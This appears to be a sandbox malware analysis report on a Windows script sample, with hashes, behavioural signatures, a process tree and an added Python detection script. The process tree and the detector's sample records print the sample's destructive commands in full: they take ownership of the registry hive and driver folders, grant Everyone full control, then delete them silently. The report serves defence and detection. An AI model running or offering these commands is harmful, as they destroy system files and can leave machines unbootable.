Analysis
- max time kernel: 122s
- max time network: 127s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 15-08-2024 21:40

Static task: static1
Behavioral task: behavioral1
Sample: target.wsf
Resource: win7-20240729-en

General
- Target: target.wsf
- Size: 3KB
- MD5: 84b27604951d4deb2f10cc65c8f5c8a4
- SHA1: 74b27bad7133462abf462923dd3d056a4d655941
- SHA256: ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
- SHA512: d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  pid   process
  1876  takeown.exe
  2612  takeown.exe
  1744  icacls.exe
  904   icacls.exe
  In this sample takeown and icacls do not gain privileges; they run from an already-administrative context (the sandbox's Admin user, with SeTakeOwnershipPrivilege enabled, see below) to strip the default ownership and ACLs from system32\config and system32\drivers so that the del that follows in each command line can remove their contents.
- Modifies file permissions (1 TTPs, 4 IoCs)
  pid   process
  904   icacls.exe
  1876  takeown.exe
  2612  takeown.exe
  1744  icacls.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description                      pid   process
  Token: SeTakeOwnershipPrivilege  2612  takeown.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Each parent/child pair below is recorded three times in the raw log (21 entries in total). Every write goes from a parent into a child it has just started, which is consistent with ordinary process creation rather than injection into an unrelated process.
  pid   process      target pid  target process
  2184  cmd.exe      2804        WScript.exe
  2804  WScript.exe  2640        cmd.exe
  2804  WScript.exe  2972        cmd.exe
  2640  cmd.exe      1876        takeown.exe
  2972  cmd.exe      2612        takeown.exe
  2640  cmd.exe      1744        icacls.exe
  2972  cmd.exe      904         icacls.exe
Processes
- [1] C:\Windows\system32\cmd.exe (PID 2184)
  cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  This root cmd.exe is the sandbox's launch wrapper: it copies the .wsf to a .vbs name and starts it. The sample's own activity begins with the WScript.exe child.
  - [2] C:\Windows\System32\WScript.exe (PID 2804)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe (PID 2640)
      "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\takeown.exe (PID 1876)
        takeown /f c:\windows\system32\config\*
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - [4] C:\Windows\system32\icacls.exe (PID 1744)
        icacls c:\windows\system32\config\* /grant everyone:(f)
        Signatures: Possible privilege escalation attempt; Modifies file permissions
    - [3] C:\Windows\System32\cmd.exe (PID 2972)
      "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\takeown.exe (PID 2612)
        takeown /f c:\windows\system32\drivers\*
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\icacls.exe (PID 904)
        icacls c:\windows\system32\drivers\* /grant everyone:(f)
        Signatures: Possible privilege escalation attempt; Modifies file permissions

Each cmd.exe chain is the same three-step sequence against a different directory: take ownership (takeown /f), grant Everyone full control (icacls /grant everyone:(f)), then delete recursively and silently (del /s /q), with all output discarded. The targets are the registry hives under system32\config and the kernel-mode drivers under system32\drivers, so the script is destructive rather than a privilege-escalation tool. Two caveats when reading the tree: del is a cmd.exe built-in, so it produces no child process and appears only inside the parent's command line; and the report records the command lines, not their outcome. The live hives and any loaded driver images are held open by the system while Windows runs, so a run like this typically removes only files that are not in use, and whether anything was actually deleted here is not shown.
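The chain in the process tree above is a good fit for a command-line based detection, because each step is visible in a process-creation record even though del itself never becomes a process. The following is an added example, not part of the report or of any sandbox's code: it takes Sysmon Event ID 1 style records (pid, ppid, image, command line), splits each cmd /c chain on && so every command is judged on its own, and flags takeown /f, icacls /grant to Everyone (by name or by the S-1-1-0 SID) and del /s against system32\config or system32\drivers, plus a script host spawning cmd.exe. The sample records are constructed from the PIDs and command lines in this report, with an invented PPID 1000 for the root and one invented benign icacls call to show what is not flagged.

```python
"""Flag takeown -> icacls /grant Everyone -> del /s chains against protected
system directories in process-creation records (Sysmon Event ID 1 style)."""
import re

# Directories whose ownership/ACL change followed by a recursive delete indicates
# a destructive action. Either slash is accepted; '\b' stops 'configuration' matching.
PROTECTED_RE = re.compile(r"[\\/]windows[\\/]system32[\\/](config|drivers)\b", re.IGNORECASE)
# icacls accepts an account name or a SID prefixed with '*'; S-1-1-0 is Everyone.
EVERYONE_PREFIXES = ("everyone:", "*s-1-1-0:")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DESTRUCTIVE_CHAIN = {"takeown", "icacls_everyone", "del_recursive"}

# Constructed sample records mirroring the report's process tree (PPID 1000 for the
# root and the final benign icacls call are invented for the example).
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 2184, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": rf'cmd /c "copy {TEMP}\target.wsf {TEMP}\target.wsf.vbs && start {TEMP}\target.wsf.vbs"'},
    {"pid": 2804, "ppid": 2184, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": rf'"C:\Windows\System32\WScript.exe" "{TEMP}\target.wsf.vbs"'},
    {"pid": 2640, "ppid": 2804, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul '
                r'&& icacls c:\windows\system32\config\* /grant everyone:(f) >nul '
                r'&& del /s /q c:\windows\system32\config\* >nul 2>&1'},
    {"pid": 1876, "ppid": 2640, "image": r"C:\Windows\system32\takeown.exe",
     "cmdline": r"takeown /f c:\windows\system32\config\*"},
    {"pid": 1744, "ppid": 2640, "image": r"C:\Windows\system32\icacls.exe",
     "cmdline": r"icacls c:\windows\system32\config\* /grant everyone:(f)"},
    {"pid": 2972, "ppid": 2804, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul '
                r'&& icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul '
                r'&& del /s /q c:\windows\system32\drivers\* >nul 2>&1'},
    {"pid": 2612, "ppid": 2972, "image": r"C:\Windows\system32\takeown.exe",
     "cmdline": r"takeown /f c:\windows\system32\drivers\*"},
    {"pid": 904, "ppid": 2972, "image": r"C:\Windows\system32\icacls.exe",
     "cmdline": r"icacls c:\windows\system32\drivers\* /grant everyone:(f)"},
    # Benign: an admin sharing a user folder. Must not be flagged.
    {"pid": 3001, "ppid": 1000, "image": r"C:\Windows\system32\icacls.exe",
     "cmdline": r"icacls C:\Users\Admin\Documents\share /grant Bob:(R)"},
]


def _basename(path):
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_verb(tokens, verb):
    # Matches 'takeown', 'takeown.exe' or a full path to it, quoted or not.
    return any(_basename(t) in (verb, verb + ".exe") for t in tokens)


def classify(event):
    """Return (stage, targets) pairs evidenced by one process's command line."""
    stages = []
    # Split 'cmd /c a && b && c' so each command is judged on its own.
    for segment in re.split(r"(?:&&|\|\||[&|])", event["cmdline"].lower()):
        targets = set(PROTECTED_RE.findall(segment))
        if not targets:
            continue
        tokens = segment.split()
        if _has_verb(tokens, "takeown") and "/f" in tokens:
            stages.append(("takeown", targets))
        if (_has_verb(tokens, "icacls") and "/grant" in tokens
                and any(t.startswith(EVERYONE_PREFIXES) for t in tokens)):
            stages.append(("icacls_everyone", targets))
        # del/erase are cmd.exe built-ins: they never spawn a process, so the only
        # place to see them is the parent cmd.exe command line itself.
        if ("del" in tokens or "erase" in tokens) and "/s" in tokens:
            stages.append(("del_recursive", targets))
    return stages


def analyze(events):
    """Correlate per-process stages and parent/child relations across a batch."""
    by_pid = {e["pid"]: e for e in events}
    stages, targets, flagged = set(), set(), set()
    for e in events:
        for stage, tg in classify(e):
            stages.add(stage)
            targets |= tg
            flagged.add(e["pid"])
        parent = by_pid.get(e["ppid"])
        if (parent and _basename(parent["image"]) in SCRIPT_HOSTS
                and _basename(e["image"]) == "cmd.exe"):
            stages.add("script_host_spawned_cmd")
            flagged.add(e["pid"])
    if DESTRUCTIVE_CHAIN <= stages:
        verdict = "destructive_acl_tamper"
    else:
        verdict = "suspicious" if stages else "clean"
    return {"verdict": verdict, "stages": sorted(stages),
            "targets": sorted(targets), "flagged_pids": sorted(flagged)}


if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The verdict is only raised to destructive when all three stages are present somewhere in the batch, so a lone takeown by an administrator stays at suspicious; the per-PID list tells the responder which processes to pull full telemetry for.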
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 84b27604951d4deb2f10cc65c8f5c8a4
  SHA1: 74b27bad7133462abf462923dd3d056a4d655941
  SHA256: ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
  SHA512: d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
- Filesize: 79B
  MD5: dfcef0997fe6b53193f96908bc2d7839
  SHA1: bec87de5852184953fe5025aa7a6017e23deead1
  SHA256: 9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
  SHA512: ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74